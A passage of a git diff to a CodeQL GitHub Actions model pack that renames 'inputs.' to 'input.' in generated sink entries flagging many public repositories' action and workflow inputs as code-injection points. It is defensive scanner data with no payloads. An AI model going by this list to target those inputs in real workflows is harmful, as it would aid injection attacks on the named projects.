["stefanprodan/podinfo", "*", "input.version", "code-injection", "generated"] + - ["stefanprodan/podinfo", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml index e75197656f5..377e439049c 100644 --- a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml +++ b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["stellar/go", "*", "inputs.go-version", "code-injection", "generated"] \ No newline at end of file + - ["stellar/go", "*", "input.go-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml index 21ea7ef13a9..1f087287d25 100644 --- a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["streetsidesoftware/cspell", "*", "inputs.name", "code-injection", "generated"] + - ["streetsidesoftware/cspell", "*", "input.name", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml index e6d2a79b847..7f317ddad8e 100644 --- a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml +++ b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["subquery/subql", "*", "inputs.package-path", "code-injection", "generated"] \ No newline at end of file + - ["subquery/subql", "*", "input.package-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml index ffd74df05e2..b1a9ea20344 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["swagger-api/swagger-codegen", "*", "inputs.options", "code-injection", "generated"] - - ["swagger-api/swagger-codegen", "*", "inputs.spec-url", "code-injection", "generated"] - - ["swagger-api/swagger-codegen", "*", "inputs.language", "code-injection", "generated"] - - ["swagger-api/swagger-codegen", "*", "inputs.job-name", "code-injection", "generated"] - - ["swagger-api/swagger-codegen", "*", "inputs.build-commands", "code-injection", "generated"] - - ["swagger-api/swagger-codegen", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["swagger-api/swagger-codegen", "*", "input.options", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "input.spec-url", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "input.language", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "input.job-name", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "input.build-commands", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml index f476d7160f6..37e39efd243 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["swagger-api/swagger-parser", "*", "inputs.logsPath", "code-injection", "generated"] - - ["swagger-api/swagger-parser", "*", "inputs.parserSpecPath", "code-injection", "generated"] - - ["swagger-api/swagger-parser", "*", "inputs.serializationType", "code-injection", "generated"] - - ["swagger-api/swagger-parser", "*", "inputs.options", "code-injection", "generated"] - - ["swagger-api/swagger-parser", "*", "inputs.inputSpec", "code-injection", "generated"] - - ["swagger-api/swagger-parser", "*", "inputs.parserVersion", "code-injection", "generated"] \ No newline at end of file + - ["swagger-api/swagger-parser", "*", "input.logsPath", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "input.parserSpecPath", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "input.serializationType", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "input.options", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "input.inputSpec", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "input.parserVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml index e95dacb65a9..9569d47329f 100644 --- a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml +++ b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tarantool/tarantool", "*", "inputs.source", "code-injection", "generated"] - - ["tarantool/tarantool", "*", "inputs.chat-id", "code-injection", "generated"] - - ["tarantool/tarantool", "*", "inputs.revision", "code-injection", "generated"] - - ["tarantool/tarantool", "*", "inputs.submodule", "code-injection", "generated"] \ No newline at end of file + - ["tarantool/tarantool", "*", "input.source", "code-injection", "generated"] + - ["tarantool/tarantool", "*", "input.chat-id", "code-injection", "generated"] + - ["tarantool/tarantool", "*", "input.revision", "code-injection", "generated"] + - ["tarantool/tarantool", "*", "input.submodule", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml index 42a9859aa23..6cf5dd84fbd 100644 --- a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml +++ b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["telepresenceio/telepresence", "*", "inputs.release_version", "code-injection", "generated"] \ No newline at end of file + - ["telepresenceio/telepresence", "*", "input.release_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml index 029e4f95a2a..ce09307f8fb 100644 --- a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml +++ b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tensorflow/datasets", "*", "inputs.extras", "code-injection", "generated"] - - ["tensorflow/datasets", "*", "inputs.tf-version", "code-injection", "generated"] \ No newline at end of file + - ["tensorflow/datasets", "*", "input.extras", "code-injection", "generated"] + - ["tensorflow/datasets", "*", "input.tf-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml index 3223e185c7b..183319e32ff 100644 --- a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml +++ b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["texstudio-org/texstudio", "*", "inputs.file", "code-injection", "generated"] \ No newline at end of file + - ["texstudio-org/texstudio", "*", "input.file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml index 26fa1ce22b7..d8fb3f98b09 100644 --- a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml +++ b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml @@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["toeverything/affine", "*", "inputs.extra-flags", "code-injection", "generated"] - - ["toeverything/affine", "*", "inputs.nmHoistingLimits", "code-injection", "generated"] - - ["toeverything/affine", "*", "inputs.path", "code-injection", "generated"] - - ["toeverything/affine", "*", "inputs.cluster-location", "code-injection", "generated"] - - ["toeverything/affine", "*", "inputs.cluster-name", "code-injection", "generated"] - - ["toeverything/affine", "*", "inputs.gcp-project-id", "code-injection", "generated"] - - ["toeverything/affine", "*", "inputs.package", "code-injection", "generated"] - - ["toeverything/affine", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file + - ["toeverything/affine", "*", "input.extra-flags", "code-injection", "generated"] + - ["toeverything/affine", "*", "input.nmHoistingLimits", "code-injection", "generated"] + - ["toeverything/affine", "*", "input.path", "code-injection", "generated"] + - ["toeverything/affine", "*", "input.cluster-location", "code-injection", "generated"] + - ["toeverything/affine", "*", "input.cluster-name", "code-injection", "generated"] + - ["toeverything/affine", "*", "input.gcp-project-id", "code-injection", "generated"] + - ["toeverything/affine", "*", "input.package", "code-injection", "generated"] + - ["toeverything/affine", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml index a68a3372089..c0c663e69f3 100644 --- a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml +++ b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["treeverse/lakefs", "*", "inputs.compose-flags", "code-injection", "generated"] - - ["treeverse/lakefs", "*", "inputs.compose-directory", "code-injection", "generated"] - - ["treeverse/lakefs", "*", "inputs.compose-file", "code-injection", "generated"] \ No newline at end of file + - ["treeverse/lakefs", "*", "input.compose-flags", "code-injection", "generated"] + - ["treeverse/lakefs", "*", "input.compose-directory", "code-injection", "generated"] + - ["treeverse/lakefs", "*", "input.compose-file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml index 6c874d64655..35c0d80a115 100644 --- a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml +++ b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["trezor/trezor-firmware", "*", "inputs.lang", "code-injection", "generated"] - - ["trezor/trezor-firmware", "*", "inputs.model", "code-injection", "generated"] - - ["trezor/trezor-firmware", "*", "inputs.status", "code-injection", "generated"] - - ["trezor/trezor-firmware", "*", "inputs.full-deps", "code-injection", "generated"] \ No newline at end of file + - ["trezor/trezor-firmware", "*", "input.lang", "code-injection", "generated"] + - ["trezor/trezor-firmware", "*", "input.model", "code-injection", "generated"] + - ["trezor/trezor-firmware", "*", "input.status", "code-injection", "generated"] + - ["trezor/trezor-firmware", "*", "input.full-deps", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml index 8d339364cf3..dc1dcff0b15 100644 --- a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml +++ b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tribler/tribler", "*", "inputs.libsodium-version", "code-injection", "generated"] - - ["tribler/tribler", "*", "inputs.command", "code-injection", "generated"] - - ["tribler/tribler", "*", "inputs.duration", "code-injection", "generated"] - - ["tribler/tribler", "*", "inputs.requirements", "code-injection", "generated"] - - ["tribler/tribler", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["tribler/tribler", "*", "input.libsodium-version", "code-injection", "generated"] + - ["tribler/tribler", "*", "input.command", "code-injection", "generated"] + - ["tribler/tribler", "*", "input.duration", "code-injection", "generated"] + - ["tribler/tribler", "*", "input.requirements", "code-injection", "generated"] + - ["tribler/tribler", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml index db6751f8ef5..2da63c894fc 100644 --- a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml @@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["trunk-io/trunk-action", "*", "inputs.tools", "code-injection", "generated"] - - ["trunk-io/trunk-action", "*", "inputs.post-init", "code-injection", "generated"] - - ["trunk-io/trunk-action", "*", "inputs.setup-deps", "code-injection", "generated"] - - ["trunk-io/trunk-action", "*", "inputs.label", "code-injection", "generated"] - - ["trunk-io/trunk-action", "*", "inputs.debug", "code-injection", "generated"] - - ["trunk-io/trunk-action", "*", "inputs.check-run-id", "code-injection", "generated"] - - ["trunk-io/trunk-action", "*", "inputs.check-all-mode", "code-injection", "generated"] - - ["trunk-io/trunk-action", "*", "inputs.cache-key", "code-injection", "generated"] \ No newline at end of file + - ["trunk-io/trunk-action", "*", "input.tools", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "input.post-init", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "input.setup-deps", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "input.label", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "input.debug", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "input.check-run-id", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "input.check-all-mode", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "input.cache-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml index 68959bf2102..3dc87b3ed76 100644 --- a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml +++ b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["unidata/metpy", "*", "inputs.key", "code-injection", "generated"] \ No newline at end of file + - ["unidata/metpy", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml index f8aa8480088..94a140a9fe1 100644 --- a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml +++ b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["unstructured-io/unstructured", "*", "inputs.python-version", "code-injection", "generated"] \ No newline at end of file + - ["unstructured-io/unstructured", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml index 0f78fddcd96..d8f78274623 100644 --- a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml +++ b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["vercel/turbo", "*", "inputs.extra-flags", "code-injection", "generated"] \ No newline at end of file + - ["vercel/turbo", "*", "input.extra-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml index 9eb860b13d9..f539135bba0 100644 --- a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml +++ b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["vesoft-inc/nebula", "*", "inputs.target-path", "code-injection", "generated"] - - ["vesoft-inc/nebula", "*", "inputs.bucket", "code-injection", "generated"] - - ["vesoft-inc/nebula", "*", "inputs.key-secret", "code-injection", "generated"] - - ["vesoft-inc/nebula", "*", "inputs.key-id", "code-injection", "generated"] - - ["vesoft-inc/nebula", "*", "inputs.endpoint", "code-injection", "generated"] - - ["vesoft-inc/nebula", "*", "inputs.asset-path", "code-injection", "generated"] - - ["vesoft-inc/nebula", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file + - ["vesoft-inc/nebula", "*", "input.target-path", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "input.bucket", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "input.key-secret", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "input.key-id", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "input.endpoint", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "input.asset-path", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml index 573b256121f..cc8a7f16492 100644 --- a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml +++ b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["vkcom/vkui", "*", "inputs.next_version", "code-injection", "generated"] - - ["vkcom/vkui", "*", "inputs.package_name", "code-injection", "generated"] - - ["vkcom/vkui", "*", "inputs.npm_tag", "code-injection", "generated"] - - ["vkcom/vkui", "*", "inputs.prev_version", "code-injection", "generated"] - - ["vkcom/vkui", "*", "inputs.new_version", "code-injection", "generated"] - - ["vkcom/vkui", "*", "inputs.pre_id", "code-injection", "generated"] \ No newline at end of file + - ["vkcom/vkui", "*", "input.next_version", "code-injection", "generated"] + - ["vkcom/vkui", "*", "input.package_name", "code-injection", "generated"] + - ["vkcom/vkui", "*", "input.npm_tag", "code-injection", "generated"] + - ["vkcom/vkui", "*", "input.prev_version", "code-injection", "generated"] + - ["vkcom/vkui", "*", "input.new_version", "code-injection", "generated"] + - ["vkcom/vkui", "*", "input.pre_id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml index c5278340c0b..ec1ed14fed5 100644 --- a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml +++ b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["vuetifyjs/vuetify", "*", "inputs.name", "code-injection", "generated"] - - ["vuetifyjs/vuetify", "*", "inputs.path", "code-injection", "generated"] - - ["vuetifyjs/vuetify", "*", "inputs.npm-tag", "code-injection", "generated"] - - ["vuetifyjs/vuetify", "*", "inputs.release-id", "code-injection", "generated"] \ No newline at end of file + - ["vuetifyjs/vuetify", "*", "input.name", "code-injection", "generated"] + - ["vuetifyjs/vuetify", "*", "input.path", "code-injection", "generated"] + - ["vuetifyjs/vuetify", "*", "input.npm-tag", "code-injection", "generated"] + - ["vuetifyjs/vuetify", "*", "input.release-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml index b11973cfa00..18b37d3c658 100644 --- a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml +++ b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["wagoodman/dive", "*", "inputs.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file + - ["wagoodman/dive", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml index 1fd3ca1f005..c1699ec6816 100644 --- a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml +++ b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml @@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["walletconnect/walletconnectswiftv2", "*", "inputs.js-client-api-host", "code-injection", "generated"] - - ["walletconnect/walletconnectswiftv2", "*", "inputs.project-id", "code-injection", "generated"] - - ["walletconnect/walletconnectswiftv2", "*", "inputs.relay-endpoint", "code-injection", "generated"] - - ["walletconnect/walletconnectswiftv2", "*", "inputs.gm-dapp-host", "code-injection", "generated"] - - ["walletconnect/walletconnectswiftv2", "*", "inputs.gm-dapp-project-secret", "code-injection", "generated"] - - ["walletconnect/walletconnectswiftv2", "*", "inputs.gm-dapp-project-id", "code-injection", "generated"] - - ["walletconnect/walletconnectswiftv2", "*", "inputs.explorer-endpoint", "code-injection", "generated"] - - ["walletconnect/walletconnectswiftv2", "*", "inputs.notify-endpoint", "code-injection", "generated"] \ No newline at end of file + - ["walletconnect/walletconnectswiftv2", "*", "input.js-client-api-host", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "input.project-id", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "input.relay-endpoint", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "input.gm-dapp-host", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "input.gm-dapp-project-secret", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "input.gm-dapp-project-id", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "input.explorer-endpoint", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "input.notify-endpoint", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml index 727a21ac960..0fe9b73b6de 100644 --- a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml +++ b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["wazuh/wazuh", "*", "inputs.target", "code-injection", "generated"] - - ["wazuh/wazuh", "*", "inputs.doxygen_config", "code-injection", "generated"] - - ["wazuh/wazuh", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["wazuh/wazuh", "*", "input.target", "code-injection", "generated"] + - ["wazuh/wazuh", "*", "input.doxygen_config", "code-injection", "generated"] + - ["wazuh/wazuh", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml index fff6557dd41..27a5defa298 100644 --- a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml +++ b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["web-infra-dev/rspack", "*", "inputs.post", "code-injection", "generated"] - - ["web-infra-dev/rspack", "*", "inputs.profile", "code-injection", "generated"] - - ["web-infra-dev/rspack", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file + - ["web-infra-dev/rspack", "*", "input.post", "code-injection", "generated"] + - ["web-infra-dev/rspack", "*", "input.profile", "code-injection", "generated"] + - ["web-infra-dev/rspack", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml index e87c7cf5c06..05fd2667812 100644 --- a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml +++ b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["webassembly/wabt", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file + - ["webassembly/wabt", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml index 9c556053d66..5a91e3cd32f 100644 --- a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml +++ b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["wntrblm/nox", "*", "inputs.python-versions", "code-injection", "generated"] \ No newline at end of file + - ["wntrblm/nox", "*", "input.python-versions", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml index 6121c00ccfd..bb632423a1c 100644 --- a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml +++ b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["xrplf/rippled", "*", "inputs.configuration", "code-injection", "generated"] - - ["xrplf/rippled", "*", "inputs.cmake-target", "code-injection", "generated"] - - ["xrplf/rippled", "*", "inputs.cmake-args", "code-injection", "generated"] \ No newline at end of file + - ["xrplf/rippled", "*", "input.configuration", "code-injection", "generated"] + - ["xrplf/rippled", "*", "input.cmake-target", "code-injection", "generated"] + - ["xrplf/rippled", "*", "input.cmake-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml index 789bdb53aed..dca76acdc27 100644 --- a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml +++ b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["zcash/zcash", "*", "inputs.destination", "code-injection", "generated"] - - ["zcash/zcash", "*", "inputs.remove-first-if-exists", "code-injection", "generated"] \ No newline at end of file + - ["zcash/zcash", "*", "input.destination", "code-injection", "generated"] + - ["zcash/zcash", "*", "input.remove-first-if-exists", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml index 58389ad753e..c0e357715de 100644 --- a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml +++ b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["zenml-io/zenml", "*", "inputs.install_integrations", "code-injection", "generated"] \ No newline at end of file + - ["zenml-io/zenml", "*", "input.install_integrations", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml index 853948c5ec3..2bc23972e78 100644 --- a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml +++ b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["zeroc-ice/ice", "*", "inputs.flags", "code-injection", "generated"] - - ["zeroc-ice/ice", "*", "inputs.make_flags", "code-injection", "generated"] \ No newline at end of file + - ["zeroc-ice/ice", "*", "input.flags", "code-injection", "generated"] + - ["zeroc-ice/ice", "*", "input.make_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml index 2e8a6683a57..740bfd26d69 100644 --- a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["0xpolygon/polygon-edge/.github/workflows/loadtest.yml", "*", "inputs.scenario", "code-injection", "generated"] \ No newline at end of file + - ["0xpolygon/polygon-edge/.github/workflows/loadtest.yml", "*", "input.scenario", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml index 55533f12312..f3bfa556ee5 100644 --- a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["8vim/8vim/.github/workflows/publish.yaml", "*", "inputs.version_code", "code-injection", "generated"] - - ["8vim/8vim/.github/workflows/publish.yaml", "*", 